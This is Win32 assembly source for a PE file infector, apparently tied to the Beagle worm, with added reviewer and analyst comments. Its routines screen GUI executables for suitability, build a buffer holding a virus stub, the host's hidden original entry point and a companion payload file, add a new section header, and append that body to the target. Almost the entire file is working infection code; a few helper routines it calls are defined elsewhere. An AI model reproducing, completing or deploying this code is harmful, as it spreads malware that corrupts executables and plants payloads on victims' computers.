  1. ; Very simple PE Infector -- Win32 MASM source. Validates a target .exe, appends a new section carrying a stub plus a companion file, and redirects execution to it (see InfectPE / AddEPSection).
  2. ; #########################################################################
  3.  
  4. .data
  5. ; .exe file to join
  ; Pointer to / byte length of the companion file that LoadWorkFile copies into a
  ; GMEM_FIXED GlobalAlloc buffer. InfectPE refuses to run while lpWorkFileData is
  ; still 0 and later appends this buffer (length-prefixed) behind its stub.
  6. lpWorkFileData dd 0
  7. dwWorkFileDataLen dd 0
  8. 
  ; Allow-list of section names, stored as consecutive NUL-terminated strings and
  ; closed by an empty string (the second ,0 after "BSS"). CheckSectionName walks
  ; it with repnz scasb; CheckSections rejects any target whose section names are
  ; not all listed here (a crude "looks unpacked / unprotected" heuristic).
  ; Matching uses lstrcmp, i.e. case-sensitive, against the full NUL-padded name.
  9. szGoodSections db ".text",0
  10. db ".rsrc",0
  11. db ".data",0
  12. db ".rdata",0
  13. db ".edata",0
  14. db ".sdata",0
  15. db ".idata",0
  16. db ".tls",0
  17. db ".bss",0
  18. db ".reloc",0
  19. db ".CRT",0
  20. db "BEGTEXT",0
  21. db "DGROUP",0
  22. db "CODE",0
  23. db "DATA",0
  24. db "BSS",0,0 ; trailing empty string terminates the table
  25.  
  26. .code
  27.  
  ; IsValidPE(lpFile) -> eax = 1 if the mapped file passes every filter below, else 0.
  ;   lpFile: base of the file mapping (raw file, not a loaded image). Clobbers edx, flags.
  ; Offsets used after PEPtrA are relative to the "PE\0\0" signature. PE32 layout:
  ; signature 4 + IMAGE_FILE_HEADER 20 = 0x18, IMAGE_OPTIONAL_HEADER32 follows.
  ; NOTE(review): PEPtrA is a macro defined elsewhere; from its uses here and in
  ; CheckHeaderSize it appears to set <reg> = lpFile + e_lfanew regardless of the
  ; register's prior value -- confirm against the macro. Nothing in this proc
  ; bounds-checks e_lfanew against the file size; a bogus value faults inside the
  ; view and is only caught by the SEH frame InfectPE installs around the call.
  28. IsValidPE proc lpFile: DWORD
  29. xor eax, eax ; default verdict: not valid
  30.  
  31. mov edx, lpFile
  32.  
  33. ; Check MZ signature
  34. cmp word ptr[edx], 'ZM' ; e_magic == "MZ" (little-endian word)
  35. jnz @not_valid_pe
  36.  
  37. ; Check some offset
  38. cmp word ptr[edx+18h], 40h ; e_lfarlc must be >= 0x40 for a PE-style DOS header (e_lfanew lives at 0x3C); signed word compare
  39. jl @not_valid_pe
  40.  
  41. ; Check PE signature
  42. PEPtrA edx ; edx -> "PE\0\0" (see note above)
  43. cmp word ptr[edx], 'EP' ; only the low word of the 4-byte signature is checked
  44. jnz @not_valid_pe
  45.  
  46. ; GUI only
  47. cmp word ptr[edx+5ch], 0002h ; OptionalHeader.Subsystem == IMAGE_SUBSYSTEM_WINDOWS_GUI; console/native images are skipped
  48. jnz @not_valid_pe
  49.  
  50. ; Doesn't support DLL files
  51. test word ptr[edx+16h], 2000h ; FileHeader.Characteristics & IMAGE_FILE_DLL
  52. jnz @not_valid_pe
  53.  
  54. ; Should not have export table, damn unwise apps
  55. cmp dword ptr[edx+78h], 0 ; DataDirectory[EXPORT].VirtualAddress must be 0
  56. jnz @not_valid_pe
  57.  
  58. ; Should present import table, win2k loader sux
  59. cmp dword ptr[edx+80h], 0 ; DataDirectory[IMPORT].VirtualAddress must be non-zero
  60. jz @not_valid_pe
  61.  
  62. inc eax ; every filter passed -> eax = 1
  63.  
  64. @not_valid_pe:
  65. ret
  66. IsValidPE endp
  67.  
  68. ; Check if new section can be added
  ; CheckHeaderSize(lpFile) -> eax = 1 if SizeOfHeaders already leaves room for one
  ; more IMAGE_SECTION_HEADER (a section can be added without moving section data),
  ; else 0. Clobbers ecx, edx, flags.
  ;   needed = e_lfanew + 0xF8 + (SectionCount + 1) * 0x28
  ;   0x28 = sizeof(IMAGE_SECTION_HEADER)
  ;   0xF8 = signature(4) + IMAGE_FILE_HEADER(20) + a hard-coded PE32 optional header (0xE0)
  ; NOTE(review): FileHeader.SizeOfOptionalHeader (PE+0x14) is never read, so an
  ; image with a non-standard optional header size is measured incorrectly.
  ; SectionCount is defined elsewhere; assumed to return NumberOfSections in eax.
  69. CheckHeaderSize proc lpFile: DWORD
  70. invoke SectionCount, lpFile
  71. inc eax ; one more section than the file has now
  72. xor edx, edx
  73. mov ecx, 28h
  74. mul ecx ; edx:eax = (count+1) * sizeof(IMAGE_SECTION_HEADER); high half unused
  75.  
  76. mov edx, lpFile
  77. mov edx, dword ptr[edx+3ch] ; e_lfanew
  78. add edx, 0f8h ; + fixed-size PE32 headers (see note)
  79. add eax, edx ; header size + sizeof new section
  80.  
  81. PEPtrA edx ; edx -> "PE\0\0" (macro defined elsewhere; replaces the edx computed above)
  82. mov edx, dword ptr[edx+54h] ; OptionalHeader.SizeOfHeaders -- header size specified in PE header
  83. .IF edx < eax ; register operands: MASM emits an unsigned compare
  84. xor eax, eax ; not enough slack for another section header
  85. .ELSE
  86. mov eax, 1
  87. .ENDIF
  88. ret
  89. CheckHeaderSize endp
  90.  
  91. ; Check if file is aligned
  ; CheckFileAlign(lpFile, dwFileSize) -> eax = 1 if dwFileSize is a whole multiple of
  ; OptionalHeader.FileAlignment (PE+0x3C), else 0. Clobbers edx, flags.
  ; The dwFileSize argument slot is reused as the divisor (callee-owned stack copy).
  ; NOTE(review): FileAlignment == 0 raises #DE on the div; only the SEH frame in
  ; InfectPE catches it. PEPtrA is a macro defined elsewhere, assumed to yield
  ; lpFile + e_lfanew independent of eax's prior (uninitialised) value.
  92. CheckFileAlign proc lpFile, dwFileSize: DWORD
  93. PEPtrA eax ; eax -> "PE\0\0"
  94. mov eax, dword ptr[eax+3ch] ; FileAlignment
  95. xor edx, edx ; clear high half for the unsigned divide
  96. xchg eax, dwFileSize ; eax = file size, [dwFileSize] = FileAlignment
  97. div dwFileSize ; edx = file size mod FileAlignment
  98. xor eax, eax
  99. test edx, edx
  100. setz al ; 1 <=> remainder is zero
  101. ret
  102. CheckFileAlign endp
  103.  
  104. ; Check if file contains only good sections (not packed/protected/etc)
  ; CheckSectionName(szSectionName) -> eax = 1 if the NUL-terminated name equals an
  ; entry of szGoodSections exactly (lstrcmp: case-sensitive), else 0.
  ; edi is preserved via USES; eax, ecx and the direction flag are clobbered.
  105. CheckSectionName proc uses edi szSectionName: DWORD
  106. mov edi, offset szGoodSections ; cursor over the NUL-separated table
  107.  
  108. @next:
  109. invoke lstrcmp, szSectionName, edi
  110. .IF !eax ; 0 == strings equal
  111. inc eax ; return 1
  112. ret
  113. .ENDIF
  114. cld
  115. xor eax, eax
  116. or ecx, -1
  117. repnz scasb ; advance edi just past this entry's terminating NUL
  118. cmp byte ptr[edi], 0 ; empty string => end of table
  119. jnz @next
  120.  
  121. xor eax, eax ; name not in the allow-list
  122. ret
  123. CheckSectionName endp
  124.  
  ; CheckSections(lpFile, dwFileSize) -> eax != 0 only if:
  ;   (1) the file has at least one section,
  ;   (2) the last section header's PhysOffs + PhysSize == dwFileSize, i.e. there is
  ;       no overlay / appended data after the last section's raw bytes, and
  ;   (3) every section's 8-byte Name is in the szGoodSections allow-list.
  ; Otherwise eax = 0. Sections are walked from the last index down to 0; on the
  ; success path eax is simply the final CheckSectionName result (1).
  ; NOTE(review): SectionCount, SectionHeadPtr and the SectionHead struct are
  ; defined elsewhere; PhysOffs/PhysSize are presumably PointerToRawData /
  ; SizeOfRawData. Check (2) assumes the highest-indexed header is also the one
  ; placed last in the file. rep movsb relies on DF being clear on entry.
  125. CheckSections proc uses esi edi ebx lpFile, dwFileSize: DWORD
  126. LOCAL s_name[9]: BYTE ; 8 name bytes + a guaranteed NUL for lstrcmp
  127.  
  128. invoke ZeroMemory, addr s_name, 9
  129.  
  130. invoke SectionCount, lpFile
  131. .IF !eax
  132. jmp @cs_ret ; zero sections -> eax = 0
  133. .ENDIF
  134. mov ebx, eax
  135. dec ebx ; ebx = index of the last section
  136.  
  137. ; Check if there's no extra data at the end of the file
  138. invoke SectionHeadPtr, ebx, lpFile
  139. mov edx, [eax][SectionHead.PhysOffs]
  140. add edx, [eax][SectionHead.PhysSize]
  141. .IF edx != dwFileSize ; overlay present (or truncated file) -> reject
  142. xor eax, eax
  143. jmp @cs_ret
  144. .ENDIF
  145.  
  146. @l: ; for ebx = last .. 0
  147. invoke SectionHeadPtr, ebx, lpFile
  148. mov esi, eax
  149. lea edi, s_name
  150. mov ecx, 8
  151. rep movsb ; copy the 8-byte Name; s_name[8] stays 0 from ZeroMemory
  152.  
  153. invoke CheckSectionName, addr s_name
  154. .IF !eax
  155. jmp @cs_ret ; unknown section name -> eax = 0
  156. .ENDIF
  157. dec ebx
  158. jns @l
  159.  
  160. @cs_ret:
  161. ret
  162. CheckSections endp
  163.  
  164. ; Pre-load file to append in the feature
  ; LoadWorkFile(lpszFileName): read the whole companion file into a GMEM_FIXED
  ; GlobalAlloc buffer and publish it via lpWorkFileData / dwWorkFileDataLen.
  ; No meaningful return value (eax is whatever the last API call left).
  ; Fails silently (globals untouched) if the file cannot be opened, sized or mapped.
  ; NOTE(review): the GlobalAlloc result is not checked -- a NULL return makes
  ; rep movsb write to address 0, and this proc has no SEH frame. A previously
  ; loaded buffer is never freed, so calling this twice leaks the first one.
  165. LoadWorkFile proc uses ebx esi edi lpszFileName: DWORD
  166. LOCAL hFile, dwFileSize: DWORD
  167.  
  168. invoke CreateFile, lpszFileName, GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0
  169. mov hFile, eax
  170. inc eax ; INVALID_HANDLE_VALUE (-1) -> 0
  171. jz @file_open_error
  172.  
  173. invoke GetFileSize, hFile, 0 ; high dword ignored; files >= 4 GB are not handled
  174. mov dwFileSize, eax
  175. inc eax ; INVALID_FILE_SIZE (-1) -> 0
  176. jz @file_open_close
  177.  
  178. invoke CreateFileMapping, hFile, NULL, PAGE_READONLY, 0, 0, NULL
  179. .IF eax
  180. mov ebx, eax ; ebx = mapping object handle
  181. invoke MapViewOfFile, eax, FILE_MAP_READ, 0, 0, 0
  182. .IF eax
  183. push eax ; keep the view base; doubles as the argument for UnmapViewOfFile below
  184.  
  185. invoke GlobalAlloc, GMEM_FIXED, dwFileSize ; result unchecked (see note)
  186. mov lpWorkFileData, eax
  187.  
  188. mov esi, [esp] ; source = mapped view
  189. mov edi, eax ; destination = new buffer
  190. mov ecx, dwFileSize
  191. mov dwWorkFileDataLen, ecx
  192. rep movsb
  193.  
  194. @not_valid_pe: ; copy-pasted label name; nothing in this proc jumps here
  195. call UnmapViewOfFile ; stdcall: consumes the view base pushed above
  196. .ENDIF
  197. invoke CloseHandle, ebx
  198. .ENDIF
  199.  
  200. @file_open_close:
  201. invoke CloseHandle, hFile
  202.  
  203. @file_open_error:
  204. ret
  205. LoadWorkFile endp
  206.  
  ; InfectPE(lpszFileName): try to add the stub + companion file to one target .exe.
  ; Flow:
  ;   1. refuse unless LoadWorkFile has populated lpWorkFileData;
  ;   2. open and map the target read/write; install an SEH frame so any fault during
  ;      the checks or patching (bad e_lfanew, FileAlignment 0, ...) lands at @not_valid_pe;
  ;   3. gate on: size > 512, IsValidPE, CheckHeaderSize, CheckFileAlign, CheckSections;
  ;   4. build WorkMem = stub bytes (@vir_code_begin..@vir_code_end, defined elsewhere)
  ;      with the host's absolute entry point stored bitwise-NOTed in the dword 8
  ;      bytes before the stub's end, then a dword length + the companion file bytes;
  ;   5. GenVirCode(WorkMem, len) -> eax = new section body, ecx = its size; then
  ;      AddEPSection(lpData, ecx, TRUE) edits the mapped headers (both routines are
  ;      defined elsewhere; by name, presumably encode the body / add an entry-point
  ;      section -- confirm);
  ;   6. unmap the view (flushing the header edits), then append the body at EOF.
  ; Returns nothing meaningful; isOK only gates the cleanup and the final write.
  ; NOTE(review): neither GlobalAlloc result nor WriteFile's return is checked; a
  ; failed or partial append leaves the patched headers describing bytes that are
  ; not in the file.
  ; Analyst notes: an affected file grows by the GenVirCode output size, gains one
  ; section header inside the existing SizeOfHeaders slack, and is skipped if it has
  ; an overlay, exports, IMAGE_FILE_DLL, a non-GUI subsystem, no imports, or a
  ; section name outside szGoodSections.
  207. InfectPE proc uses ebx esi edi lpszFileName: DWORD
  208. LOCAL hFile, dwFileSize, lpWorkMem, lpVirMem, dwVirSize, lpData: DWORD
  209. LOCAL isOK: DWORD
  210.  
  211. mov lpVirMem, 0
  212. mov lpWorkMem, 0
  213. mov isOK, 0
  214.  
  215. cmp lpWorkFileData, 0 ; nothing to carry yet -> bail out
  216. jz @file_open_error
  217.  
  218. invoke CreateFile, lpszFileName, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0
  219. mov hFile, eax
  220. inc eax ; INVALID_HANDLE_VALUE (-1) -> 0
  221. jz @file_open_error
  222.  
  223. invoke GetFileSize, hFile, 0 ; high dword ignored
  224. mov dwFileSize, eax
  225. inc eax ; INVALID_FILE_SIZE (-1) -> 0
  226. jz @file_open_close
  227.  
  228. invoke CreateFileMapping, hFile, NULL, PAGE_READWRITE, 0, 0, NULL
  229. .IF eax
  230. mov ebx, eax ; ebx = mapping object handle
  231. invoke MapViewOfFile, eax, FILE_MAP_ALL_ACCESS, 0, 0, 0
  232. .IF eax
  233. mov lpData, eax ; writable view of the whole target file
  234. mov esi, eax
  235.  
  236. InstSehFrame <offset @not_valid_pe> ; macro (not shown): faults below resume at @not_valid_pe
  237.  
  238. cmp dwFileSize, 512 ; signed compare: tiny files (and sizes >= 2 GB) are rejected
  239. jle @not_valid_pe
  240.  
  241. invoke IsValidPE, esi
  242. test eax, eax
  243. jz @not_valid_pe
  244.  
  245. invoke CheckHeaderSize, esi
  246. test eax, eax
  247. jz @not_valid_pe
  248.  
  249. invoke CheckFileAlign, esi, dwFileSize
  250. test eax, eax
  251. jz @not_valid_pe
  252.  
  253. invoke CheckSections, esi, dwFileSize
  254. test eax, eax
  255. jz @not_valid_pe
  256.  
  257. invoke Sleep, 20 ; 20 ms pause per accepted target -- presumably throttling
  258.  
  259. mov eax, 1024+@vir_code_end-@vir_code_begin ; stub size + 1024 bytes of slack (purpose not shown)
  260. add eax, dwWorkFileDataLen
  261. invoke GlobalAlloc, GMEM_FIXED, eax ; result unchecked (see note)
  262. mov lpWorkMem, eax
  263.  
  264. PEPtrB edx, esi ; macro (not shown): edx -> target's "PE\0\0", base taken from esi
  265.  
  266. ; Write virus code into WorkMem
  267. mov esi, offset @vir_code_begin ; esi no longer the view base from here on
  268. mov edi, lpWorkMem
  269. mov ecx, @vir_code_end-@vir_code_begin
  270. rep movsb ; edi now points just past the copied stub
  271.  
  272. ; Fix OEP in WorkMem buffer
  ; The stub is assumed to reserve a dword slot 8 bytes before its end; it receives
  ; ~(AddressOfEntryPoint + ImageBase), i.e. the inverted absolute host entry point.
  273. m2m dword ptr[edi-8], dword ptr[edx+28h] ; m2m macro (not shown); PE+0x28 = AddressOfEntryPoint (RVA)
  274. mov eax, dword ptr[edx+34h] ; PE+0x34 = ImageBase
  275. add dword ptr[edi-8], eax ; -> absolute VA of the original entry point
  276. not dword ptr[edi-8] ; stored bitwise-inverted
  277.  
  278. ; Write beagle body into WorkMem
  ; "beagle" is the original author's term for the companion file loaded by
  ; LoadWorkFile; it is stored as a dword length followed by the raw bytes.
  279. mov eax, dwWorkFileDataLen
  280. stosd ; length prefix
  281. mov esi, lpWorkFileData
  282. mov ecx, eax
  283. rep movsb ; payload bytes
  284.  
  285. ; Create virus section WorkMem->VirMem
  286. mov eax, edi
  287. sub eax, lpWorkMem ; eax = bytes actually used in WorkMem
  288. invoke GenVirCode, lpWorkMem, eax ; defined elsewhere: returns eax = new buffer, ecx = its size
  289. mov lpVirMem, eax
  290. mov dwVirSize, ecx
  291.  
  292. ; Add section header
  293. invoke AddEPSection, lpData, ecx, TRUE ; edits the mapped headers in place; semantics not shown
  294.  
  295. mov isOK, 1
  296.  
  297. @not_valid_pe: ; shared exit for rejected targets and for faults caught by the SEH frame
  298. KillSehFrame ; macro (not shown): pops the handler installed above
  299. invoke UnmapViewOfFile, lpData ; unmapping flushes any header edits to the file
  300. .IF lpWorkMem
  301. invoke GlobalFree, lpWorkMem
  302. .ENDIF
  303. .IF (!isOK) && (lpVirMem) ; failure after GenVirCode: drop the body so no write happens
  304. invoke GlobalFree, lpVirMem
  305. mov lpVirMem, 0
  306. .ENDIF
  307. .ENDIF
  308. invoke CloseHandle, ebx
  309. .IF lpVirMem ; only set when isOK == 1
  310. ; Write virus section contents
  311. invoke SetFilePointer, hFile, 0, NULL, FILE_END
  312. invoke WriteFile, hFile, lpVirMem, dwVirSize, addr lpWorkMem, NULL ; lpWorkMem slot reused for bytes-written; result unchecked
  313. invoke GlobalFree, lpVirMem
  314. .ENDIF
  315. .ENDIF
  316.  
  317. @file_open_close:
  318. invoke CloseHandle, hFile
  319.  
  320. @file_open_error:
  321. ret
  322. InfectPE endp